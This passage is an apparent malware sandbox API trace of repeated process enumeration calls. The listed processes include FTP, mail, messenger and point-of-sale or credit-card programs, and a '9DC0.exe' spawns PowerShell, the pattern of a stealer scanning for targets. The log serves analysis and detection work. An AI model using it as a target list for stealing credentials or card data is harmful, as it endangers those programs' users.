hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0212.248] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0212.250] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0212.252] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0212.256] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0212.257] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0212.259] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0212.261] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0212.262] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0212.264] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0212.266] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0212.267] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0212.269] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0212.270] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0212.272] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0212.274] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0212.312] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0212.314] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0212.315] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0212.317] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0212.318] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0212.321] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0212.323] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0212.325] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0212.327] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0212.329] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0212.332] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0212.334] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0212.336] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0212.338] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0212.340] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0212.342] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0212.344] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0212.398] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0212.402] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0212.404] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0212.406] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0212.408] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0212.412] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0212.414] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0212.416] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0212.418] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0212.420] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0212.422] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0212.424] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0212.427] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0212.430] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0212.437] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0212.439] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0212.441] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0212.488] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0212.490] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0212.492] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0212.494] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0212.496] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0212.498] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0212.500] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0212.502] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0212.504] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0212.506] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0212.509] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0212.510] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0212.512] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0212.516] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0212.518] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0212.521] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.560] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0212.563] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0212.565] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.566] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.568] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0212.571] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0212.573] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0212.574] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.576] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0212.578] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0212.580] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0212.582] CloseHandle (hObject=0x1eb8) returned 1 [0212.582] Sleep (dwMilliseconds=0x64) [0212.621] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0212.682] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.684] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.686] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.688] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.690] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, 